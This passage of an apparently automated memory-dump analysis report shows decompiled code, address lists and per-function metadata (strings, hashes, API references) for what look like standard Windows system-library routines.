						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L00F4DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E00F3B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E00F3B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E00F3E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E00F3A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x00efb171
0x00efb171
0x00efb171
0x00efb171
0x00efb171
0x00efb176
0x00efb17b
0x00efb180
0x00efb186
0x00efb18f
0x00efb198
0x00efb1a4
0x00efb1aa
0x00f54802
0x00f54802
0x00f54805
0x00f5480c
0x00f5480e
0x00efb1d1
0x00efb1d3
0x00efb1de
0x00efb1de
0x00f54817
0x00f5481e
0x00f54820
0x00f54822
0x00f54822
0x00f54824
0x00f54824
0x00f5482a
0x00000000
0x00000000
0x00f54835
0x00f5483a
0x00f5483d
0x00f5483f
0x00f54842
0x00f54842
0x00f54842
0x00f54846
0x00f5484c
0x00f5484e
0x00f54851
0x00f54851
0x00f54853
0x00f54854
0x00f54854
0x00f54858
0x00f5485a
0x00f5485a
0x00f5485d
0x00f5485f
0x00f54861
0x00f54861
0x00f54866
0x00f5486b
0x00f5486e
0x00f54871
0x00f54876
0x00f54876
0x00f54878
0x00f5487b
0x00f54884
0x00f54884
0x00000000
0x00f5487d
0x00f5487d
0x00f54882
0x00f54889
0x00f54889
0x00f5488f
0x00f54891
0x00f548e0
0x00f548e2
0x00f548e4
0x00f548e4
0x00f548e7
0x00f548e7
0x00f548ed
0x00f548f4
0x00f548f6
0x00f54951
0x00f54951
0x00f54953
0x00f54953
0x00f54956
0x00f54956
0x00f54958
0x00f54959
0x00f54959
0x00f5495d
0x00f5495d
0x00f5495f
0x00f5495f
0x00f54965
0x00f54969
0x00f549ba
0x00f549ba
0x00f549c1
0x00f549c5
0x00f549cc
0x00f549d4
0x00f549d7
0x00f549da
0x00f549e4
0x00f549e5
0x00f549f3
0x00f54a02
0x00000000
0x00f54a02
0x00f54972
0x00f54974
0x00000000
0x00000000
0x00f54976
0x00f54979
0x00f54982
0x00f54983
0x00f54984
0x00f5498b
0x00f5498d
0x00f54991
0x00f54993
0x00f54999
0x00f5499d
0x00f549a2
0x00f549a2
0x00f549a2
0x00f54999
0x00f549ac
0x00000000
0x00f549b3
0x00f548f8
0x00f548fe
0x00000000
0x00000000
0x00000000
0x00f548fe
0x00f54895
0x00f5489c
0x00f548ad
0x00f548b2
0x00f548b5
0x00f548b7
0x00f548ba
0x00f548bc
0x00f548c6
0x00f548c6
0x00f548cb
0x00f548d1
0x00f548d4
0x00f548d8
0x00f548d8
0x00000000
0x00f548d8
0x00f548be
0x00f548c0
0x00000000
0x00000000
0x00f548c2
0x00000000
0x00000000
0x00000000
0x00f548c4
0x00000000
0x00f54882
0x00f5487b
0x00f54904
0x00f54906
0x00000000
0x00000000
0x00f54908
0x00f5490e
0x00000000
0x00000000
0x00f54910
0x00f54917
0x00f54917
0x00000000
0x00f54917
0x00efb1ba
0x00f547f9
0x00f547fc
0x00000000
0x00000000
0x00000000
0x00f547fc
0x00efb1c0
0x00efb1c0
0x00efb1c3
0x00efb1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 00F548AD

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 9001ed101bb012644df9f2195f45e76378457101c91acea0b053dce1b2bcecbc
Instruction ID: cbb5c22995ec4f34cc2109f86a561a89c3c7277c4cfd1929051dd1065d43af13
Opcode Fuzzy Hash: 9001ed101bb012644df9f2195f45e76378457101c91acea0b053dce1b2bcecbc
Instruction Fuzzy Hash: 8351F471D002598FDB30CF64C841BBEBBB0BF04729F1041ADEE59AB281D7346D89AB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F1B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F1B9A5

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 3451c82b892ebc6c9c6f2255fe2b16cff30d7ec070b49b6324325657d2446bcd
Instruction ID: e6e2795f52eb90af2b110eec39bf763feb06c54f8969b2b200fab352fab5afbc
Opcode Fuzzy Hash: 3451c82b892ebc6c9c6f2255fe2b16cff30d7ec070b49b6324325657d2446bcd
Instruction Fuzzy Hash: EA514871A08345CFC720DF29C480A6ABBE5BF88760F64496EF98597355D734EC80EB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F22581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON

Download Yara Rule

Strings

PATH, xrefs: 00F22642, 00F22691

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 733be1497e36fea5c31070fd407122935e9496df1eef5175f863fd6080c20bcd
Instruction ID: 2f09d0e51cf752ad75a97fca517b0e49fb5a2919bc9317f5179c89725faf04e4
Opcode Fuzzy Hash: 733be1497e36fea5c31070fd407122935e9496df1eef5175f863fd6080c20bcd
Instruction Fuzzy Hash: 22C18F72D04229EBCB65DF99EC81BADBBB1FF48750F144029F401BB2A1D734A941EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F2FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON

Download Yara Rule

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00F6BE0F

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 4e3bfc9cfe4c76562953bedbeb2c7258c471f635eabd36ee02cf75396605cc6d
Instruction ID: f0c5de9f2c70621e26f666df349d1db7028e835d903d5f9119c816e73a18ef5e
Opcode Fuzzy Hash: 4e3bfc9cfe4c76562953bedbeb2c7258c471f635eabd36ee02cf75396605cc6d
Instruction Fuzzy Hash: D0A11332F1062A8BDB25DB64D850BBAB3B4AF44720F144579E806DB791DB34DD49FB80

Uniqueness

Uniqueness Score: -1.00%

Function 00EF2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 00F4FA4A

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 1e031f548734ba23342ca825eff8fe09c29fc2a7395adce242b9885f3f246939
Instruction ID: 03df19f7137c1c8772852f5d443c81b68b78138b15f860eb03ca2dcaa92ee673
Opcode Fuzzy Hash: 1e031f548734ba23342ca825eff8fe09c29fc2a7395adce242b9885f3f246939
Instruction Fuzzy Hash: 6C612631E006489FDB32DF68C880BBE7BB5EF44724F240279EA19A72C1C7789D45A791

Uniqueness

Uniqueness Score: -1.00%

Function 00FC0EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

`, xrefs: 00FC0F16

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 5999e62669e5428dc7920d5bc3eb2888ab30c9c6c96e4122bae65aec87065e3a
Instruction ID: ddd6a807461898ae99bdb148fcda3f3664cfc0fa785808fa786aa1c5c654774e
Opcode Fuzzy Hash: 5999e62669e5428dc7920d5bc3eb2888ab30c9c6c96e4122bae65aec87065e3a
Instruction Fuzzy Hash: 6B51D0712083429FD324DF18DA82F1BB7E5FBC5310F04092CF98687292DA74E886DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F2F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

@, xrefs: 00F2F124

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 2c5ea7a12118cb3e1aea7d12048c358ab7dd29be40cbc398612dfb9aefc51063
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 87519D72504710AFC321DF59C841A6BB7F8FF88720F108A2DF99587690E7B8E954DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F73540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 00F7358F

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 5dcf3670de27279b983540a35f7cf8a614e8045541e108905d62cb8267482a0a
Instruction ID: 4fee38f85f3b37bb3812fb3a46aca650f1956b1018686e069975a8dc3bf971fd
Opcode Fuzzy Hash: 5dcf3670de27279b983540a35f7cf8a614e8045541e108905d62cb8267482a0a
Instruction Fuzzy Hash: 5B4145B1D0052CABDB21DA50CC81FDEB77CAB44714F0085A6EA0DAB241DB749F89EF95

Uniqueness

Uniqueness Score: -1.00%

Function 00FC05AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

`, xrefs: 00FC0633

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: cc86aafde658e2965acb8d02f445f2567949d25456ff2b1134b8c68b5ee65d34
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: 8C311132604306ABE720DE25CE86F9B77D9AB84764F044228F9489B2C0DA70ED15EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F73884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 00F738B4

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: b0c506f74377b07d095e8283a72ced6dc9accdb3e63e071728592291861dd987
Instruction ID: 00ad11ea5fa5693a94cafbd9854cd82393158f60a4bca39682a942bc26d87ca8
Opcode Fuzzy Hash: b0c506f74377b07d095e8283a72ced6dc9accdb3e63e071728592291861dd987
Instruction Fuzzy Hash: 81310872D01519BFDB15DA58C945EABB776EB80720F11816AEA18A7280D7709F00F792

Uniqueness

Uniqueness Score: -1.00%

Function 00F2D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 00F2D303

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: bfaac73f01b50983b6b46730be00c7196e0bf9b014f831b6e4307bfeecf5f8ba
Instruction ID: 18642991b90481905f12024e082d5525e3250c8303b3dd2600b9abf558118aa1
Opcode Fuzzy Hash: bfaac73f01b50983b6b46730be00c7196e0bf9b014f831b6e4307bfeecf5f8ba
Instruction Fuzzy Hash: EE31B1B25083559FC311DF28D881AABBBE8FB85764F10092EF994D3250D635DD04EB93

Uniqueness

Uniqueness Score: -1.00%

Function 00F01B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

WindowsExcludedProcs, xrefs: 00F01BC5

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: db2d58f82b8d5a8bc192e0a65268dd50d04007e80205f029a450c44cc802ee2f
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 9B21F577941228ABEB22AB558D40F9BB7ADBF81761F168425FE049B280D734DC01F7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00F1F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 00F1F73F

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 8d66cb44c086100cb0528aadf46b1f4bf11ac0eae5989122ce401a590d2fe6c0
Instruction ID: e3e9b5a4fe57ca5a97bf3bc5fd4466ebb200f90820f926e58e8b8013558f1f6d
Opcode Fuzzy Hash: 8d66cb44c086100cb0528aadf46b1f4bf11ac0eae5989122ce401a590d2fe6c0
Instruction Fuzzy Hash: 4A11B636B046028BEB244E1D84907F67296EB95734F34453AE866CB3E1D770DCC9B740

Uniqueness

Uniqueness Score: -1.00%

Function 00FA8DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

Critical error detected %lx, xrefs: 00FA8E21

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 44a983d365a832ce58be3a259cba85047403ec0572fc5e1cc1f234e07a4dcb5d
Instruction ID: 7cac8ea9bef8bd670d3a6875d15a25d77a8fa102b7d3cc4d17dcf5c081cca5c7
Opcode Fuzzy Hash: 44a983d365a832ce58be3a259cba85047403ec0572fc5e1cc1f234e07a4dcb5d
Instruction Fuzzy Hash: 3C118BB1D04348EBDF24CFA889467DCBBB0BB05350F20421EE929AB282D7740602EF14

Uniqueness

Uniqueness Score: -1.00%

Function 00F8FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00F8FF60

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 13696d367274a5a8c6aca127eea60872a45e7787e319febc63e63e758d6f40c8
Instruction ID: 77577e35d1712d6bbc8f9bc6ac4dd85ddae4c1e2d26fd92537d611ac3df88c5d
Opcode Fuzzy Hash: 13696d367274a5a8c6aca127eea60872a45e7787e319febc63e63e758d6f40c8
Instruction Fuzzy Hash: F211A171910688EFDB21EB50CD49FD87BB2BB04724F148154F6056B2A2C73D9954EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FC5BA5, Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6580698527dbe3d597d6aec275323efcc500e90ec410f23f98f10724432d9e9c
Instruction ID: d697d050be86658dd954e36d7b46ba02a63dbad91c27a871c50b46dd28f44a21
Opcode Fuzzy Hash: 6580698527dbe3d597d6aec275323efcc500e90ec410f23f98f10724432d9e9c
Instruction Fuzzy Hash: B6427871D0422A8FDB24CF68C981BA9B7B1BF49714F1481AED84DEB342D734AA85DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00F14120, Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f42d0727e54c826d75373fe2d950783ca8fb9232fff8980c47280e3b00c95a3e
Instruction ID: a9d4dcbf65b28fd38a002ec3ddc6dffa91b21111d188948b43439b1e37876226
Opcode Fuzzy Hash: f42d0727e54c826d75373fe2d950783ca8fb9232fff8980c47280e3b00c95a3e
Instruction Fuzzy Hash: 26F19F719083518BC728CF19C480ABAB7E1FFD8714F14492EF996CB290E734E985EB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F220A0, Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14b13354521720992c42ed6d48fcfd7588c4ee8c3427f65429e137598b07fd26
Instruction ID: 1b416c892172a1450b6dd85b9de3b339b530c6074083045b24b14d74ac87b344
Opcode Fuzzy Hash: 14b13354521720992c42ed6d48fcfd7588c4ee8c3427f65429e137598b07fd26
Instruction Fuzzy Hash: 85F14231A08751EFE765CF28D840B6A77E1AF84730F14852DE899AB281D739DC41FB82

Uniqueness

Uniqueness Score: -1.00%

Function 00F0D5E0, Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f493cf10c2e6f7996ffbfc744ba8656a5487d42bf65b17e489645511ff36b67
Instruction ID: 77d7428ef2e9855654ba26f8824283661b9952076f882ac6e6260ddaeac2f9fd
Opcode Fuzzy Hash: 6f493cf10c2e6f7996ffbfc744ba8656a5487d42bf65b17e489645511ff36b67
Instruction Fuzzy Hash: 31E1BF31A00359CFDB24DF54CD80B6AB7B2BF85324F1441A9E909AB2D1DB34AD85FB51

Uniqueness

Uniqueness Score: -1.00%

Function 00F1B236, Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
Instruction ID: ad1b977bffafe7e8b1c0a13febe1745cce1031270bf82d7e4b3d9f76f30cf7b9
Opcode Fuzzy Hash: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
Instruction Fuzzy Hash: CCB1DF31B00A09DFDB25DBA9CC90BBEB7B5AF84310F244169E552D7282D734DD80EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F0849B, Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32e42bb62aa8a386f6151115f0e99a62058410560ab3a1464a9f26c34c2f3917
Instruction ID: 601d9c7aa04e2553e88aa09e900e3723d5dfb1bf2d37ca0472af0f1824d60232
Opcode Fuzzy Hash: 32e42bb62aa8a386f6151115f0e99a62058410560ab3a1464a9f26c34c2f3917
Instruction Fuzzy Hash: FAB1BD75E04349DFDB18DF98C980AADBBB5BF84354F204129E405AB385DB74AD46FB40

Uniqueness

Uniqueness Score: -1.00%

Function 00F2513A, Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da1f96c507fec9f5cc565bcfb0533304a3f8dd93078024b1e31d1ac8723a0517
Instruction ID: 9cdea6599eb19aa42a1c1222ecd67ddbd4ec795830fb226c1fbbac3c6286f484
Opcode Fuzzy Hash: da1f96c507fec9f5cc565bcfb0533304a3f8dd93078024b1e31d1ac8723a0517
Instruction Fuzzy Hash: 92C111759083808FD354CF28C580A5AFBF1BF88714F144A6EF8998B392D775E945DB42

Uniqueness

Uniqueness Score: -1.00%

Function 00F203E2, Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 174368bb0904b597a9a221b1c781fde915a206d3161a8a5127eb271947af5444
Instruction ID: 09e7506b61d87561b6b9f9cfc41b328e565e2f305930935e7b3b2229b128cf16
Opcode Fuzzy Hash: 174368bb0904b597a9a221b1c781fde915a206d3161a8a5127eb271947af5444
Instruction Fuzzy Hash: 6E910A32E042689FDB21FB68DC45BAD77B4AB01734F154265F910AB2D2DB78AD40E781

Uniqueness

Uniqueness Score: -1.00%

Function 00EFC600, Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c59a7de2ac08e9d080d832f8915f75feea10b1c0ff38af44e0020d42327ffb9
Instruction ID: 17e9acb745f2fdd16cf490db58a80e64f901dbf5a48c71c720efbda1ac1a9ad2
Opcode Fuzzy Hash: 0c59a7de2ac08e9d080d832f8915f75feea10b1c0ff38af44e0020d42327ffb9
Instruction Fuzzy Hash: 2E819176A0C3028BCB25EE54C881B7E73E4EF84368F24485AED459B255D334ED40EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F2138B, Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
Instruction ID: bcef7e51ff664b6e9a3152bbc98d2a6489cf6307356054d830302c435d184142
Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
Instruction Fuzzy Hash: B681CD71A007459FCB24CF68C845BAABBF5FF58310F14856AE84AC7751D334EA41DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F8B8D0, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9a91c17ea4d41144d6f23410ef4fafe67255180b682f7eddb982c945a8c3c22
Instruction ID: 039a6b71402189a4afbc77939a00064c3378701f741eccc9ee9e067ded532185
Opcode Fuzzy Hash: a9a91c17ea4d41144d6f23410ef4fafe67255180b682f7eddb982c945a8c3c22
Instruction Fuzzy Hash: FF71F132600B01AFD736EF14CC45FA6B7E5EB84720F244528EA558B2E1DBB9E941EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F76DC9, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 422ed69a634d583e3a550792ac16f251e8d43e5142addcca0d0d5022a393bf30
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 0F717171D00619EFCB11EFA4C984EDEBBB9FF48710F10416AE509E7251D734AA41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EF52A5, Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4484c4ad688375003a96b067ee64203c74bb1f9910d769767e006c12eb009da9
Instruction ID: 3075bb2469ad4ede61fdb11fbe8d80f4a9f89b1eaa1c7e765328687c563a529b
Opcode Fuzzy Hash: 4484c4ad688375003a96b067ee64203c74bb1f9910d769767e006c12eb009da9
Instruction Fuzzy Hash: 0F51E071109745ABD321EF24CC42B2BBBE4FF50710F24091AF695976A2EB74E844E792

Uniqueness

Uniqueness Score: -1.00%

Function 00F22AE4, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e46d4159932183684cd497b5c654c0889e4120befaeaf00c95ba444efa248940
Instruction ID: 480d481b844619dc2878079e673da536f2d2baf53609e04356ff2649e34d4ee2
Opcode Fuzzy Hash: e46d4159932183684cd497b5c654c0889e4120befaeaf00c95ba444efa248940
Instruction Fuzzy Hash: 6F51CD76B00129DFCB58CF1CD8809BDB7B1FBD8700715845AE846AB360D734AA51EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FBAE44, Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b914c88b4129dc4848da38ac71d5de4cb143731a46f72a51dae4be48f2b6174
